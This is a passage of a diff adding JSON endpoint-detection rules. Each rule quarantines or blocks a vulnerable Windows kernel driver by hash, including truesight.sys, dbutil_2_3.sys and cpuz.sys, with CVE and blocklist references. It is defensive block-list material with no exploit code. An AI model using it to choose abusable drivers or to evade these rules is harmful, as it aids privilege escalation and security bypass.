+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459921Z",
+ "creation_date": "2026-03-23T11:45:30.459925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45b07a2f387e047a6bb0e59b7f22fb56182d57b50e84e386a38c2dbb7e773837",
+ "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8dfae742-47d8-5c9c-9217-cbd112a1048b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607183Z",
+ "creation_date": "2026-03-23T11:45:29.607185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96ee751f7c38731e97773e07e0f13f4dd361af9aaa1d30b41652c2e6efc3fb3e",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e08e94f-ebd1-531d-9eb4-e8d8ff16ff99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828614Z",
+ "creation_date": "2026-03-23T11:45:30.828616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e18f303d27c753bee0f90637e5a8c3ae1f76276d1419430a335c2d2b0b66f3b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e11b7fe-6820-5c0a-888f-4a4b5ee0452a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975804Z",
+ "creation_date": "2026-03-23T11:45:29.975806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975812Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7419b05e74733d2b7ce4c860ab74043b816a7f66a1ff7eec81fe3b35730e3bbb",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e1783a9-8e63-5d78-bc12-47c7c81bc7e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828203Z",
+ "creation_date": "2026-03-23T11:45:31.828205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6c5360fb5cf9a441c51255d27039ceebdcf532e25c98a41c5facf6b00ae05c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e26b953-ce06-58eb-92ea-3095be8f5477",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822789Z",
+ "creation_date": "2026-03-23T11:45:31.822792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822801Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e1a9526605bbdcf72085e2fecec7ce06265af73aa196a963fc9d1122b1883ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e395393-6f7e-5edd-aea7-8f25beb5122e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605629Z",
+ "creation_date": "2026-03-23T11:45:29.605631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e07211224b02aaf68a5e4b73fc1049376623793509d9581cdaee9e601020af06",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e4388f7-051f-5d35-ada0-4292d97f356b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830908Z",
+ "creation_date": "2026-03-23T11:45:30.830910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7c3a0128e7111625f77f9a7ff615a297e60c293c1532523685d67f88054bde9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e50f6ca-d6a1-5365-bb90-65483a5369e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826132Z",
+ "creation_date": "2026-03-23T11:45:30.826135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "027000b80fb5c703aeb2de72dd540653392eab608142bbba13f949345c101b28",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e54f236-0506-58e1-85f1-3a2720b8a492",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486971Z",
+ "creation_date": "2026-03-23T11:45:31.486974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486982Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f7621d4651e80986142b4673dc335e39708b4cfef21b71ddd955ae31a14657c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e5546b9-f808-5feb-b6a7-180022cb715d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983211Z",
+ "creation_date": "2026-03-23T11:45:29.983213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e627923-faec-52af-bfd6-1d37a2bbb2c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616381Z",
+ "creation_date": "2026-03-23T11:45:29.616383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c942801884999057aabdc01707570371afdb077979ee2f318c05276123b78e7",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e678966-9e56-54ff-9907-ed85717d537d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144124Z",
+ "creation_date": "2026-03-23T11:45:31.144126Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7b7774480af293fbfac7f3c038b897d54aab36afe0afae210b3640b40fefec8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e6c7db6-3880-5c46-a654-5f9ef85665ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834003Z",
+ "creation_date": "2026-03-23T11:45:30.834006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61f139d722bea6618c688a7f74b5a04907c7308d9fc434a1033439f0d26c90b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e6cc692-fde4-55cd-8d3b-4ba23c2f1457",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823773Z",
+ "creation_date": "2026-03-23T11:45:30.823775Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d4862fb20b01f19eaf86774ecbb20a137163d969554ac9b91c3c92fe103ea7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e744983-55ae-50bc-97fe-db3663208398",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620441Z",
+ "creation_date": "2026-03-23T11:45:29.620443Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e7965f9-9d49-53e1-835c-cbdcd2a34e50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473367Z",
+ "creation_date": "2026-03-23T11:45:30.473370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78d49094913526340d8d0ef952e8fe9ada9e8b20726b77fb88c9fb5d54510663",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e84d1be-7d77-5fa8-9192-c8f8cce37711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152804Z",
+ "creation_date": "2026-03-23T11:45:31.152807Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61923c135d0847549f5869a5a91d78ba945e3f5c1c6d5b31dfe34ad8911b5ae3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8e8b25dc-55b4-5ebd-bd03-c46da2ce3f13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618023Z",
+ "creation_date": "2026-03-23T11:45:29.618025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "423d58265b22504f512a84faf787c1af17c44445ae68f7adcaa68b6f970e7bd5",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8eaeaf65-32d8-5555-9dd8-764cc57ee5a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818265Z",
+ "creation_date": "2026-03-23T11:45:31.818268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a39fe7b7cc504ed53435aefd9050f7bebe2115e87f6089006f0ad26404e52419",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ebebc4b-0827-5d4f-8583-39cd88fa0c0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823361Z",
+ "creation_date": "2026-03-23T11:45:31.823364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec97b2ca7836cba139fd394132a06b7eaaff3f78a15110a28acf6368e9837148",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ec416e2-9b78-5ca8-92bf-57c184d2347e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483597Z",
+ "creation_date": "2026-03-23T11:45:31.483601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ddb52f71b17725e01328632bc62197d8d880b6e349a7f96e153a8e3e1520e77",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ecbf4ee-d4fb-5b07-a4aa-ee2060c2fd2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
